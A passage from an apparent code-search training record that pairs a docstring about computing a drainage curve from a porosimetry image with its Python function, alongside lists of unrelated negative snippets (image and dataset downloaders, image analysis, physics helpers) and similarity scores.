response.ok:\n if not output_path:\n output_path = os.path.join(TMP_FOLDER, '{}.png'.format(correlation_id))\n with open(output_path, 'wb') as f:\n f.write(response.content)\n except Exception as e:\n log.warn('Error downloading [{}]: [{}]'.format(image_url, e))\n output_path = None\n return output_path", "def get_images(self):\n # test\n for it in self.xml.iterfind('image'):\n print(it)\n\n elements = []\n els = self.xml.findall('image')\n for el in els:\n elements.push(el.find('src')[0])\n els = self.xml.findall('full_picture')\n elements = elements + els\n self.__download_(elements)", "def download_image(filename, url):\n if not url:\n return url\n refresh_needed = False\n if xbmcvfs.exists(filename) and filename == url:\n # only overwrite if new image is different\n return filename\n else:\n if xbmcvfs.exists(filename):\n xbmcvfs.delete(filename)\n refresh_needed = True\n if xbmcvfs.copy(url, filename):\n if refresh_needed:\n refresh_image(filename)\n return filename\n\n return url", "def download_mnist (data='training'):\n assert data in ['training', 'testing']\n \n if data == 'training':\n images_url = 'http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz'\n labels_url = 'http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz'\n else:\n images_url = 'http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz'\n labels_url = 'http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz'\n \n (images_fn_gz, _) = urllib.urlretrieve ('http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz')\n (labels_fn_gz, _) = urllib.urlretrieve ('http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz')\n return (images_fn_gz, labels_fn_gz)", "def download_images(self, im_format: str):\n rows = self.tbl_images.get_selected_rows()\n ids = []\n names = []\n for r in rows:\n ids.append(self.tbl_images.item(r, 0).text())\n names.append(self.tbl_images.item(r, 1).text())\n\n if len(ids) == 1:\n\n # Create File Save Dialog\n dialog = QFileDialog(parent=self, caption='Save As..')\n\n dialog.setMimeTypeFilters([\"image/\"+im_format.lower()])\n dialog.setFileMode(QFileDialog.AnyFile)\n\n if dialog.exec_() == QDialog.Accepted:\n filename = dialog.selectedFiles()[0]\n ret = api.get_download_images(ids, im_format, self.user_hash)\n if ret.get('success') is False:\n self.show_error(ret['error_msg'])\n else:\n image_b = b64s_to_b(ret['data'])\n with open(filename, 'wb+') as f:\n f.write(image_b)\n\n elif len(ids) >= 1:\n\n # Create File Save Dialog\n dialog = QFileDialog(parent=self, caption='222Save As..')\n dialog.setMimeTypeFilters(['application/zip'])\n dialog.setFileMode(QFileDialog.AnyFile)\n\n if dialog.exec_() == QDialog.Accepted:\n filename = dialog.selectedFiles()[0]\n ret = api.get_download_images(ids, im_format, self.user_hash)\n if ret.get('success') is False:\n self.show_error(ret['error_msg'])\n else:\n image_b = b64s_to_b(ret['data'])\n with open(filename, 'wb+') as f:\n f.write(image_b)\n else:\n return", "def get_img_from_url(index, url):\n try:\n with urllib.request.urlopen(url) as response:\n if response.headers.get_content_maintype() == 'image':\n image_filename = image_filename_prefix.format(name=image_class_name,\n counter=index,\n ext=response.headers.get_content_subtype())\n image_filepath = os.path.join(target_folder, image_filename)\n with open(image_filepath, 'wb') as image_file:\n image_file.write(response.read())\n\n print('Fetched URL {}'.format(index))\n\n except urllib.request.HTTPError:\n pass\n except Exception:\n pass", "def download_image_urls(\n urls_filename: Union[Path, str],\n synsets: List[str],\n max_concurrent: int = 50,\n rewrite: bool = False\n) -> Dict[str, Optional[List[str]]]:\n print(\"Downloading image urls.\")\n synsets_to_urls = asyncio.run(_download_image_urls(urls_filename, synsets, max_concurrent, rewrite))\n return synsets_to_urls", "def download_coco(): \n file_type = '.zip'\n img_to_download = ['val','test','train']\n ann_to_download = ['annotations_trainval','image_info_test']\n base_url_images = 'http://images.cocodataset.org/zips/'\n base_url_ann = 'http://images.cocodataset.org/annotations/'\n\n\n click.echo(click.style(f\"\\n DOWNLOAD ANNOTATIONS \\n\", bg='green', bold=True, fg='white'))\n for ann in ann_to_download:\n\n ## build Urls\n ann_url = base_url_ann + ann + str(cfg.COCO_YEARS) + file_type\n \n click.echo(click.style(f'\\nDownloading of {ann} ...\\n', bg='blue', bold=True, fg='white'))\n click.echo(f'{ann} will be downloaded')\n\n zip_filename_location = save_zip_from_url(ann_url,cfg.PATH_ANNOTATIONS)\n #zip_filename_location = \"/home/kamgo-gpu/Schreibtisch/stuff_annotations_trainval2017.zip\"\n click.echo(f\"the downloaded zip file was saved in to {zip_filename_location}\")\n\n click.echo(click.style(f'\\n Extraction of {ann} ...\\n', bg='blue', bold=True, fg='white'))\n click.echo(f'{ann} will be extracted and the zip-file will be deleted')\n\n # Extract zip to annotation directory\n Extract_zip_file(zip_filename_location,cfg.PATH_ANNOTATIONS)\n\n click.echo(click.style(f\"\\n DOWNLOAD IMAGES \\n\", bg='green', bold=True, fg='white'))\n for dataset in img_to_download:\n ## build Urls\n dataset_img_url = base_url_images + dataset + str(cfg.COCO_YEARS) + file_type\n \n click.echo(click.style(f'\\n Downloading of {dataset} ...\\n', bg='blue', bold=True, fg='white'))\n click.echo(f'{dataset} will be downloaded')\n\n zip_filename_location = save_zip_from_url(dataset_img_url,cfg.PATH_IMAGES)\n click.echo(f\"the downloaded zip file was saved in to {zip_filename_location}\")\n click.echo(click.style(f'\\n Extraction of {dataset} ...\\n', bg='blue', bold=True, fg='white'))\n click.echo(f'{dataset} will be extracted and the zip-File will be deleted')\n\n # set complet Path to save images\n Extract_zip_file(zip_filename_location,cfg.PATH_IMAGES)\n\n click.echo(click.style(f'\\n Download and extraction termined successfull {dataset} ...\\n', bg='green', bold=True, fg='white'))", "def download():\n raise NotImplementedError", "def make_request(api: IsicApi, image_set: list, params: DownloadCommandParameters) -> Union[List[dict], None]:\n # Convert to a json array\n url_image_ids = json.dumps(str(image_set))\n\n # Replace and switch quote notation for the API\n url_image_ids = url_image_ids.replace('\"', \"\")\n url_image_ids = url_image_ids.replace(\"'\", '\"')\n # Quote all url strings.\n url_image_ids = urllib.parse.quote(url_image_ids)\n # Create the endpoint URL\n endpoint = f\"image/download?include={params.include}&imageIds={url_image_ids}\"\n\n # Request the images and return the response\n return api.get(endpoint=endpoint, timeout=params.timeout)" ]
[ "0.66714674", "0.6665392", "0.662957", "0.65895194", "0.6587865", "0.6502355", "0.64724034", "0.64450634", "0.64316654", "0.6391709", "0.6382724", "0.6302078", "0.6292136", "0.6259905", "0.6259636", "0.6252637", "0.6219414", "0.6212664", "0.61892736", "0.61513776", "0.6140734", "0.6130097", "0.61186403", "0.61059463", "0.60937715", "0.60852975", "0.6082696", "0.60770524", "0.6076696", "0.6074698", "0.60599357", "0.60217124", "0.6017428", "0.60118985", "0.60002387", "0.59866005", "0.5978882", "0.59767026", "0.5962165", "0.59571236", "0.59329945", "0.592053", "0.5920478", "0.5919601", "0.591461", "0.59138435", "0.5904527", "0.58841175", "0.5874268", "0.58701175", "0.5842259", "0.5835956", "0.58274394", "0.5826139", "0.5820414", "0.5800625", "0.57987154", "0.5796462", "0.5794441", "0.5778131", "0.5768174", "0.57647574", "0.57375836", "0.57352346", "0.57315505", "0.5730508", "0.5723643", "0.5721905", "0.5714879", "0.57137394", "0.571118", "0.5709375", "0.57090086", "0.5701457", "0.56909835", "0.56894076", "0.56885594", "0.5687672", "0.56865996", "0.56815106", "0.5674733", "0.567155", "0.56711656", "0.56429815", "0.5641784", "0.5636759", "0.56311226", "0.5630112", "0.56167525", "0.5611035", "0.5605663", "0.56035334", "0.560033", "0.55979204", "0.558997", "0.5588969", "0.5577205", "0.5573583", "0.5558204", "0.555792" ]
0.6981115
0
r""" Calculate drainage curve based on the image produced by the ``porosimetry`` function. Returns
def get_drainage_data(self): im = self.result sizes = sp.unique(im) R = [] Snwp = [] Vp = sp.sum(im > 0) for r in sizes[1:]: R.append(r) Snwp.append(sp.sum(im >= r)) Snwp = [s/Vp for s in Snwp] data = namedtuple('xy_data', ('radius', 'saturation')) return data(R, Snwp)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def read_drainage_efficiency(self):#, PLOT, FIGURE, DISTRIBUTION):\n\n print ' Reading drainage efficiency'\n\n self.drainage_efficiency = {}\n\n drainage = np.zeros(self.ATTM_nrows * self.ATTM_ncols)\n\n for i in range(0, self.ATTM_nrows * self.ATTM_ncols):\n if self.ATTM_Total_Fractional_Area[i] > 0.0 :\n if self.Terrestrial['Drainage_Efficiency_Distribution'].lower() == 'random':\n chance = random.random()\n if chance > self.Terrestrial['Drainage_Efficiency_Random_Value']:\n self.drainage_efficiency[i] = 'above'\n drainage[i] = 1.\n else:\n self.drainage_efficiency[i] = 'below'\n drainage[i] = 2. # redundant, but explicit\n elif self.Terrestrial['Drainage_Efficiency_Distribution'].lower() == 'above':\n self.drainage_efficiency[i] = 'above'\n drainage[i] = 1.\n elif self.Terrestrial['Drainage_Efficiency_Distribution'].lower() == 'below':\n self.drainage_efficiency[i] = 'below'\n drainage[i] = 2.\n else: \n self.drainage_efficiency[i] = 'none'\n drainage[i] =0.\n\n print ' done.'\n print ' '\n\n # ==================================================\n # Create desired output files, figures, and plots\n # ==================================================\n if self.Terrestrial['Drainage_Efficiency_Figure'].lower() == 'yes':\n # -------------------------\n # Move to output directory\n # -------------------------\n if self.Simulation_area.lower() == 'barrow':\n os.chdir(self.control['Run_dir']+self.Output_directory+'/Barrow')\n\n # -----------------------\n # Create desired output\n # -----------------------\n drainage = np.reshape(drainage, [self.ATTM_nrows, self.ATTM_ncols])\n\n fig = pl.figure()\n pl.imshow(drainage, interpolation='nearest', cmap='bone')\n pl.colorbar( extend = 'max', shrink = 0.92)\n pl.title('Drainage efficiency')\n pl.savefig('./Initialization/Drainage_efficiency.png', format = 'png')\n drainage.tofile('./Initialization/Drainage_efficiency.bin')\n pl.close()\n\n os.chdir(self.control['Run_dir'])", "def pois_metric(pipe_diameter, delta_p, pipe_length):\n mu = 0.001 # water @ 25 degrees C\n pois = mu * 10\n flow_rate_lam = (math.pi * (pipe_diameter ** 4) * delta_p) / (128 * pois * pipe_length)\n\n return flow_rate_lam", "def prada(self):\n scale_factor = 1.0 / (1.0 + self.snapshot.header.redshift)\n r200c_physical = self.r200c * scale_factor / 1000.0 # units Mpc\n\n v200 = (\n (self.snapshot.const.G * self.m200c)\n / r200c_physical\n * self.snapshot.const.Mpc ** 2\n / 1000.0 ** 2\n ) ** 0.5 # units km/s\n\n def y(x, vmax, v200):\n func = np.log(1 + x) - (x / (1 + x))\n return ((0.216 * x) / func) ** 0.5 - (vmax / v200)\n\n concentration = np.zeros((len(self.vmax)))\n for halo in range(self.N_halos):\n if v200[halo] > self.vmax[halo]:\n concentration[halo] = -9999.0\n else:\n try:\n concentration[halo] = newton(\n y, x0=5.0, args=(self.vmax[halo], v200[halo])\n )\n except:\n concentration[halo] = -9999.0\n\n return concentration", "def priceit(self):\n paytree = np.zeros((self.steps+1,self.steps+1))\n paytree[-1,:] = np.array( list( map(lambda x:max(x-self.s,0.0),self.pricetree[-1,:]) ) )\n discount = math.exp( self.r*self.deltatime )\n for i in range(self.steps,0,-1):\n for j in range(i):\n paytree[i-1][j] = (paytree[i][j]*self.upprob +paytree[i][j+1]*(1-self.upprob))/discount\n return paytree[0][0]", "def bern_metric(pipe_diameter, delta_p, pipe_length):\n fr_c = 0.003 # assuming Reynolds number is 10**5 and pipe material is smooth copper\n fr_reyn = 0.046 / (reynolds_num(pipe_diameter, delta_p, pipe_length) ** 0.2) # Taitel and Dukler approximation\n rho = 1000 # density of water @ 4 deg celsius (kg/m**3)\n\n v = math.sqrt((2 * delta_p) / (rho * (4 * fr_reyn * (pipe_length / pipe_diameter) - 1)))\n flow_rate_turb = v * ((math.pi / 4) * (pipe_diameter ** 2))\n\n return flow_rate_turb, v", "def calc_rsi(image):\n\n # roll axes to conventional row,col,depth\n img = np.rollaxis(image, 0, 3)\n\n # bands: Coastal(0), Blue(1), Green(2), Yellow(3), Red(4), Red-edge(5), NIR1(6), NIR2(7)) Multispectral\n COAST = img[:, :, 0]\n B = img[:, :, 1]\n G = img[:, :, 2]\n Y = img[:, :, 3]\n R = img[:, :, 4]\n RE = img[:, :, 5]\n NIR1 = img[:, :, 6]\n NIR2 = img[:, :, 7]\n\n arvi = old_div((NIR1 - (R - (B - R))), (NIR1 + (R - (B - R))))\n dd = (2 * NIR1 - R) - (G - B)\n gi2 = (B * -0.2848 + G * -0.2434 + R * -0.5436 + NIR1 * 0.7243 + NIR2 * 0.0840) * 5\n gndvi = old_div((NIR1 - G), (NIR1 + G))\n ndre = old_div((NIR1 - RE), (NIR1 + RE))\n ndvi = old_div((NIR1 - R), (NIR1 + R))\n ndvi35 = old_div((G - R), (G + R))\n ndvi84 = old_div((NIR2 - Y), (NIR2 + Y))\n nirry = old_div((NIR1), (R + Y))\n normnir = old_div(NIR1, (NIR1 + R + G))\n psri = old_div((R - B), RE)\n rey = old_div((RE - Y), (RE + Y))\n rvi = old_div(NIR1, R)\n sa = old_div(((Y + R) * 0.35), 2) + old_div((0.7 * (NIR1 + NIR2)), 2) - 0.69\n vi1 = old_div((10000 * NIR1), (RE) ** 2)\n vire = old_div(NIR1, RE)\n br = (old_div(R, B)) * (old_div(G, B)) * (old_div(RE, B)) * (old_div(NIR1, B))\n gr = old_div(G, R)\n rr = (old_div(NIR1, R)) * (old_div(G, R)) * (old_div(NIR1, RE))\n\n ###Built-Up indices\n wvbi = old_div((COAST - RE), (COAST + RE))\n wvnhfd = old_div((RE - COAST), (RE + COAST))\n\n ###SIs\n evi = old_div((2.5 * (NIR2 - R)), (NIR2 + 6 * R - 7.5 * B + 1))\n L = 0.5 # some coefficient for Soil Adjusted Vegetation Index (SAVI) DO NOT INCLUDE IN FEATURES\n savi = old_div(((1 + L) * (NIR2 - R)), (NIR2 + R + L))\n msavi = old_div((2 * NIR2 + 1 - ((2 * NIR2 + 1) ** 2 - 8 * (NIR2 - R)) ** 0.5), 2)\n bai = old_div(1.0, ((0.1 + R) ** 2 + 0.06 + NIR2))\n rgi = old_div(R, G)\n bri = old_div(B, R)\n\n rsi = np.stack(\n [arvi, dd, gi2, gndvi, ndre, ndvi, ndvi35, ndvi84, nirry, normnir, psri, rey, rvi, sa, vi1, vire, br, gr, rr,\n wvbi, wvnhfd, evi, savi, msavi, bai, rgi, bri],\n axis=2)\n\n return rsi", "def calculate_probabilities(self):\n all_probabilities = [self.calculate_insolation_probabilities(),\n self.calculate_soil_demand_probabilities(),\n self.calculate_soil_depth_probabilities(),\n self.calculate_water_demand_probabilities()]\n final_probabilities = Image(size=self.controller.image_height_map.size, dtype=np.float)\n reasons_for_not_growing = [0, 0, 0, 0]\n for y in range(self.controller.image_height_map.size):\n for x in range(self.controller.image_height_map.size):\n probability = 1.0\n for i in range(len(all_probabilities)):\n if all_probabilities[i][y][x] < probability:\n probability = all_probabilities[i][y][x]\n if probability == 0.0:\n reasons_for_not_growing[i] += 1\n final_probabilities.image[y][x] = probability\n location_factor_with_max_reasons_for_not_growing = 0\n for j in range(len(reasons_for_not_growing)):\n if j >= 2: # soil demand should be skipped because it is a obvious reason\n if reasons_for_not_growing[j] > reasons_for_not_growing[location_factor_with_max_reasons_for_not_growing]:\n location_factor_with_max_reasons_for_not_growing = j\n location_factors = [\"insolation\", \"soil demand\", \"soil depth\", \"water demand\"]\n print(\"Main reason for not growing (except soil demand): \" + location_factors[location_factor_with_max_reasons_for_not_growing])\n return final_probabilities", "def gasoilratio(pressure2, P_bubble, sg2, api, temp2, Rsb):\n import numpy as np\n Rs_array = []\n\n if pressure2 < P_bubble:\n # Using Vazquez and Beggs\n if api <=30:\n c1 = 0.0362\n c2 = 1.0937\n c3 = 25.7240\n if api > 30:\n c1 = 0.0178\n c2 = 1.187\n c3 = 23.9310\n Rs = (pressure2**c2) * c1 * sg2 * np.exp((c3 * api) / (temp2 + 459.67)) \n \n if pressure2 >= P_bubble:\n # Because Rs will be constant above BB\n Rs = Rsb\n \n return Rs", "def taucurveder(self, p, x):\n y = -(p[1] * numpy.exp((p[2] + x) / p[3]) / p[3] - p[4] * numpy.exp(-(p[5] + x) / p[6]) / p[6]) / (\n p[1] * numpy.exp((p[2] + x) / p[3]) +\n p[4] * numpy.exp(-(p[5] + x) / p[6])) ** 2.0\n # print 'dy: ', y\n return y", "def contrast_curve_core(\n star_data,\n plate_scale,\n fwhm=1,\n radius_size=None,\n center=None,\n):\n\n # make copy of data array\n data = star_data.copy()\n\n# data = np.abs(data) #DO NOT DO THIS!!!! It's making the standard deviation too small later.\n\n ################## establish center ########\n\n x, y = np.indices((data.shape))\n\n if type(center) == type(None):\n center = np.array(\n [(x.max() - x.min()) / 2.0, (y.max() - y.min()) / 2.0]\n )\n\n if type(radius_size) == type(None):\n radius_size = fwhm\n\n ########## set up radial coordinate system ########\n\n radii = np.sqrt((x - center[0]) ** 2 + (y - center[1]) ** 2)\n radii = radii.astype(np.int64)\n\n ones = np.ones_like(data)\n\n number_of_a = int(radii.max() / radius_size)\n\n pie_edges = np.arange(0, 390, 30)\n\n ######## set up aperture array ##########\n center_ap = CircularAperture([center[0], center[1]], radius_size)\n\n all_apers, all_apers_areas, all_masks = (\n [center_ap],\n [center_ap.area],\n [center_ap.to_mask(method=\"exact\")],\n )\n\n all_data, all_weights = [all_masks[0].multiply(data)], [\n all_masks[0].multiply(ones)\n ]\n\n all_stds = [twoD_weighted_std(all_data[0], all_weights[0])]\n\n ######## construct the apertures of the annuli #######\n sigma_clip = SigmaClip(sigma=3.0)\n bkgrms = StdBackgroundRMS(sigma_clip)\n\n medians = np.zeros((number_of_a, len(pie_edges) - 1))\n stds = np.zeros((number_of_a, len(pie_edges) - 1))\n seps = np.zeros(number_of_a)\n for j in range(int(number_of_a)):\n r_in = j * radius_size + fwhm\n r_out = j * radius_size + radius_size + fwhm\n seps[j] = (r_in+r_out)/2.*plate_scale\n\n # terminate if completely outside 10 arcseconds\n if (r_in * plate_scale) > 10:\n break\n\n # create aperture\n aper = CircularAnnulus(\n [center[0], center[1]],\n r_in=r_in,\n r_out=r_out,\n )\n\n # multiply the data by the aperture mask and store it\n all_apers.append(aper)\n all_apers_areas.append(aper.area)\n mask = aper.to_mask(method=\"exact\")\n all_masks.append(mask)\n mask_data = mask.multiply(data)\n\n mask_weight = mask.multiply(ones)\n\n for i, pie_edge_near in enumerate(pie_edges[:-1]):\n pie_edge_far = pie_edges[i + 1]\n mask_data_new = mask_data.copy()\n mask_data_new = check_boundaries(\n mask_data_new, pie_edge_near, pie_edge_far\n )\n medians[j, i] = np.nanmedian(mask_data_new)\n mask_data_masked = mask_data_new[~np.isnan(mask_data_new)]\n\n mean, std = meanclip(mask_data_masked, 3, converge_num=0.2)\n stds[j, i] = std\n\n #Return only the medians and stds for distances within the desired range\n seps = seps[0:j]\n medians = medians[0:j,:]\n stds = stds[0:j,:]\n return seps, medians, stds", "def glycolysis_rate_cal (self) :\n x = self.mitochondria.get_atp()\n y = self.mitochondria.get_adp()\n a = self.atp\n b = self.adp\n self.adp_to_atp(self.mitochondria.atp_translocase(math.ceil((x*b - a*y)/(a+b+x+y))))\n if a<1 :\n return\n else :\n self.set_glycolysis(int(5*b/a))", "def eady_growth_rate(data):\n N2 = ixr.brunt_vaisala(data)\n f = 2.0*omega*xruf.sin(xruf.deg2rad(data.lat))\n\n dz = ixr.domain.calculate_dz(data)\n du = ixr.domain.diff_pfull(data.ucomp, data)\n\n N = xruf.sqrt(N2.where(N2 > 0))\n\n egr = 0.31*du/dz*f/N\n return np.abs(egr)", "def _calpara(self):\n self.up = math.exp(self.sigma*math.sqrt(self.deltatime))\n self.down = math.exp(-self.sigma*math.sqrt(self.deltatime))\n self.upprob = (math.exp((self.r-self.d)*self.deltatime)-self.down)/(self.up-self.down)", "def P(lag):\n N = len(SP)\n ratios = SP[lag:N]/SP[0:N-lag]\n P = 100.*(ratios-1.)\n return P", "def rate_density(self, value):\n\n # TODO: analyse for certain that log units cancel out\n # with the change in occr\n\n if value.ndim == 2:\n value = value.T\n\n R_i = np.digitize(value[0], self._R_boundaries) - 1\n P_i = np.digitize(value[1], self._P_boundaries) - 1\n\n # Remove the ones out of bounds (oob_mask = out of bounds mask)\n oob_mask = np.zeros_like(R_i, dtype=bool)\n oob_mask = oob_mask | ((R_i < 0) | (R_i >= np.shape(self.occr)[0]))\n oob_mask = oob_mask | ((P_i < 0) | (P_i >= len(self._P_boundaries)-1))\n\n R_i = R_i[~oob_mask]\n P_i = P_i[~oob_mask]\n\n return self.occr[R_i] * self._cpf_grid[R_i, P_i]", "def pipeline(image,motorq):\n\n height = image.shape[0]\n width = image.shape[1]\n region_of_interest_vertices = [\n (0, height),\n (width / 2, 0),\n (width, height),\n ]\n blur = cv2.blur(image,(5,5))\n gray_image = cv2.cvtColor(blur, cv2.COLOR_RGB2GRAY)\n\n cannyed_image = cv2.Canny(gray_image, 100, 200)\n \n # cropped_image = region_of_interest(\n # cannyed_image,\n # np.array(\n # [region_of_interest_vertices],\n # np.int32\n # ),\n # )\n \n lines = cv2.HoughLinesP(\n cannyed_image,\n rho=6,\n theta=np.pi / 60,\n threshold=160,\n lines=np.array([]),\n minLineLength=40,\n maxLineGap=25\n )\n \n left_line_x = []\n left_line_y = []\n right_line_x = []\n right_line_y = []\n #print(lines)\n if not np.any(lines):\n return image\n \n for line in lines:\n for x1, y1, x2, y2 in line:\n #print line\n if (x2-x1) == 0:\n break\n slope = float(y2 - y1) / (x2 - x1)\n if math.fabs(slope) < 0.5:\n continue\n if slope <= 0:\n left_line_x.extend([x1, x2])\n left_line_y.extend([y1, y2])\n else:\n right_line_x.extend([x1, x2])\n right_line_y.extend([y1, y2])\n\n if len(left_line_x)==0 or len(right_line_x)==0:\n return image\n\n min_y = int(image.shape[0] * (3 / 5))\n max_y = int(image.shape[0])\n\n poly_left = np.poly1d(np.polyfit(\n left_line_y,\n left_line_x,\n deg=1\n ))\n \n left_x_start = int(poly_left(max_y))\n left_x_end = int(poly_left(min_y))\n \n poly_right = np.poly1d(np.polyfit(\n right_line_y,\n right_line_x,\n deg=1\n ))\n \n right_x_start = int(poly_right(max_y))\n right_x_end = int(poly_right(min_y))\n\n line_image = draw_lines(\n image,\n [[\n [left_x_start, max_y, left_x_end, min_y],\n [right_x_start, max_y, right_x_end, min_y],\n ]],\n thickness=5,\n )\n\n x_int = Intersect([left_x_start, max_y], [left_x_end, min_y], [right_x_start, max_y], [right_x_end, min_y])[0]\n #print(line_image.shape()[0])\n middle = line_image.shape[0]/2\n if x_int < middle-140:\n motorq.put( [ -13000 , 0 ] )\n elif x_int > middle+140:\n motorq.put( [ 0, -13000 ] )\n else:\n motorq.put( [ -13000, -13000 ] )\n\n \n\n\n return line_image", "def internal_rate_of_return(proforma):\n return np.irr(proforma['Yearly Net Value'].values)", "def photometric_calibration():\n pass", "def calculate_soil_depth_probabilities(self):\n soil_depth_probabilities = []\n for y in range(self.controller.image_height_map.size):\n print(\"Calculating soil depth probabilities: Row: \" + str(y))\n row = []\n for x in range(self.controller.image_height_map.size):\n available_soil_depth = self.controller.image_edaphic_map.image[y][x]\n needed_soil_depth = self.vegetation.soil_depth_demand\n if available_soil_depth < needed_soil_depth:\n probability = available_soil_depth / needed_soil_depth\n else:\n probability = 1.0\n row.append(probability)\n soil_depth_probabilities.append(row)\n return soil_depth_probabilities", "def tail_ratio(returns):\n\n return np.abs(np.percentile(returns, 95)) / \\\n np.abs(np.percentile(returns, 5))", "def relative_rate(self) -> \"double\":\n return _beamforming_swig.doaesprit_sptr_relative_rate(self)", "def get_dial_value(self, img):\n cimg = img.copy()\n cimg = cv2.medianBlur(cimg,5)\n mask = np.zeros_like(raw_img)\n radius = int(self.radius*0.6)\n mask = cv2.circle(mask,self.center,radius,(255,0,0),-1)\n mask = cv2.circle(mask,self.center,int(radius*0.2),(0,0,255),int(radius*0.5))\n cimg = cv2.bitwise_and(cimg, mask)\n edges = cv2.Canny(cimg,50,150,apertureSize = 3)\n minLineLength = int(radius*0.3)\n maxLineGap = 5\n lines = cv2.HoughLinesP(edges,1,np.pi/180,75,minLineLength,maxLineGap)\n if lines is not None:\n for line in lines:\n for x1,y1,x2,y2 in line:\n cv2.line(cimg,(x1,y1),(x2,y2),(255,255,0),1)\n return cimg", "def calculateUSky(self):\n skyline = []\n for p in self.pruned:\n pastart = [self.drange[0] for i in range(self.dim)]\n pamax = p.getLocationMax()\n pdom = list(self.index.intersection(tuple(pastart+pamax),objects=True))\n if len(pdom) == 1 and pdom[0].object == p:\n skyline.append([p, 1.0])\n else:\n finalp = 0.0\n for i in range(p.getPCount()):\n base = p.getProb(i)\n loc = p.getLocation(i)\n intersec = list(self.index.intersection(tuple(pastart+loc),objects=True))\n for d in intersec:\n dobj = d.object\n if dobj != p:\n tprob = 0.0\n for idx in range(dobj.getPCount()):\n if dominateStat(dobj.getLocation(idx),loc) == True:\n tprob += dobj.getProb(idx)\n tprob = 1.0 - tprob\n base *= tprob\n finalp += base\n skyline.append([p, finalp])\n for p in skyline:\n print(p[0])\n print(p[1])\n print(\"\")\n # print(skyline)", "def breakdown_prob(self):\n if self.age <= 1:\n return self._breakdown_ratio + (self.breakdowns*self._broken_before)\n else:\n return ((self.age*self._breakdown_ratio) +\n (self.breakdowns*self._broken_before))", "def __CalculatePerimeter(self, curve):\r\n return cv2.arcLength(curve, True)", "def recompute_exit_pupil(self):\r\n\r\n rearZ = self.rear_z()\r\n if rearZ <= 0.0:\r\n print('Not focus')\r\n rearRadius = self.rear_aperture()\r\n samples = 1024 * 1024\r\n half = 2.0 * rearRadius\r\n proj_bmin, proj_bmax = ti.Vector([-half, -half]), ti.Vector([half, half])\r\n for i in range(pupil_interval_count):\r\n r0 = ti.cast(i, ti.f32) / pupil_interval_count * self.film_diagnal / 2.0\r\n r1 = ti.cast(i + 1, ti.f32) / pupil_interval_count * self.film_diagnal / 2.0\r\n bmin, bmax = make_bound2()\r\n count = 0\r\n for j in range(samples):\r\n u, v= ti.random(), ti.random()\r\n film_pos = ti.Vector([lerp(ti.cast(j, ti.f32)/samples, r0, r1), 0.0, 0.0])\r\n x, y = lerp(u, -half, half), lerp(v, -half, half)\r\n lens_pos = ti.Vector([x, y, rearZ])\r\n if inside_aabb(bmin, bmax, ti.Vector([x, y])):\r\n ti.atomic_add(count, 1)\r\n else:\r\n ok, _, _ = self.gen_ray_from_film(film_pos, (lens_pos - film_pos).normalized())\r\n if ok:\r\n bmin, bmax = bound_union_with(bmin,bmax, ti.Vector([x, y]))\r\n ti.atomic_add(count, 1)\r\n\r\n if count == 0:\r\n bmin, bmax = proj_bmin, proj_bmax\r\n\r\n # extents pupil bound\r\n delta = 2 * (proj_bmax - proj_bmin).norm() / ti.sqrt(samples)\r\n bmin -= delta\r\n bmax += delta\r\n\r\n self.exitPupilBoundMin[i] = bmin\r\n self.exitPupilBoundMax[i] = bmax", "def compute_energy(img):\r\n # urmati urmatorii pasi:\r\n # 1. transformati imagine in grayscale\r\n # 2. folositi filtru sobel pentru a calcula gradientul in directia X si Y\r\n # 3. calculati magnitudinea imaginii\r\n\r\n img_gray_scale = cv.cvtColor(img, cv.COLOR_BGR2GRAY);\r\n\r\n #de cautat totusi si codul pt SOBEL pe net\r\n grad_x = cv.Sobel(img_gray_scale, ddepth = cv.CV_16S, dx = 1, dy = 0, borderType = cv.BORDER_CONSTANT)\r\n grad_y = cv.Sobel(img_gray_scale, ddepth = cv.CV_16S, dx = 0, dy = 1, borderType = cv.BORDER_CONSTANT)\r\n\r\n#E repr gradientii aka cat se sch un pixel de la unul la altul\r\n E = abs(grad_x) + abs(grad_y)\r\n # print(grad_y)\r\n # print(grad_x)\r\n\r\n cv.imwrite(\"poza.jpg\", E)\r\n return E", "def R(self):\n\t\treturn (arange(self.rbins) + 0.5) * (self.cbins - 0.5) / self.rbins", "def getRatio(probe_num, position_vector, shot_range, dir, day ='050119r'):\n ratio_x = 0\n ratio_y = 0\n ratio_z = 0\n # helm_B = [0,0,0]\n divideby = 0\n for shot in range(shot_range[0], shot_range[1]+1):\n print( 'On shot ', day+str(shot), ' for probe ',probe_num)\n x,y,z, currmax,helmB_new = probe_calib(day+str(shot), probe_num, position_vector,dir)\n ratio_x = ratio_x + x\n ratio_y = ratio_y + y\n ratio_z = ratio_z + z\n # helm_B = [helm_B[i] + helmB_new[i] for i in len(helmB)]\n divideby = divideby + 1 #averaging over the number of shots\n ratio_Bx = ratio_x/divideby\n ratio_By = ratio_y/divideby\n ratio_Bz = ratio_z/divideby\n # helmB = [helm_B]/divideby\n # print ratio_Bx, ratio_By, ratio_Bz, helmB\n # print(\"ratio_Bx %f, ratio_By %f, ratio_Bz %f, helmB%s\"%(ratio_Bx, ratio_By, ratio_Bz, helmB))\n Bx_sqr =ratio_x**2\n By_sqr =ratio_y**2\n Bz_sqr =ratio_z**2\n B = Bx_sqr + By_sqr+ Bz_sqr\n norm_factor = np.sqrt(B)\n ratio_Bx, ratio_By, ratio_Bz = [ratio_Bx, ratio_By, ratio_Bz]/norm_factor\n\n return (ratio_Bx, ratio_By, ratio_Bz, norm_factor)", "def compute(self, Rs, D):\n self.Rs = Rs\n self.D = D\n self.M = (self.Rs * c**2 * au) / (2 * G * M_sun)\n print(\"M = %.1e M☉\\t%.2e Kg\" % (self.M, self.M*M_sun))\n print(\"Rs = %s ua\\t%.2e m\" % (self.Rs, self.Rs*au))\n print(\"D = %s ua\\t%.2e m\\n\" % (self.D, self.D*au))\n\n vrai_debut = time.process_time()\n\n\n seen_angle, deviated_angle = self.trajectories()\n\n self.interpolation = self.interpolate(seen_angle, deviated_angle)\n\n if self.display_interpolation is True:\n xmin = np.min(seen_angle)\n xmax = np.max(seen_angle)\n seen_angle_splin = np.linspace(xmin, xmax, 20001)\n deviated_angle_splin = 